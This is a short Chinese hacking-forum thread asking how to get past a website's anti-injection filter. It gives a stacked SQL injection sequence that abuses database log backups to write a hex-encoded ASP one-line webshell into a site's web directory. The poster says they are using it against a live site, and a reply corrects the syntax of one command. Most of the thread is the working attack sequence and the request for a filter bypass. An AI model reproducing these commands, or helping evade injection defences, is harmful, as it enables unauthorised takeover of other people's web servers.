[讨论]关于SQL注入备份 碰到防注入脚本
议题作者:shenlye信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
通常情况下,遇到DB权限备份,我们使用的代码是。。
;alter database 8gyl RECOVERY FULL--
;create table cmd (a image)--
;backup log 8gyl to disk = 'c:\cmd' with init--
;insert into cmd (a) values (0x3C25657865637574652072657175657374282276616C75652229253E)--
;backup log 8gyl to disk = 'd:\website\8gyl\ri.asp'--
'drop table cmd--
如果提示:
varchar 值 '3506;alter database 8gyl RECOVERY FULL--' 转换为数据类型为 int 的列时发生语法错误。
我们就在语句前面加个‘号。。但是。今天碰到一个站。竟然使用了防注入。使用’号时。提示:
防注入系统提示。请不要在参数中包含非法字符尝试注入
不知道怎么样绕过防注入系统。。。请问怎么解决。 ;alter database 8gyl RECOVERY FULL--
这句咱少个set ?
页:
[1]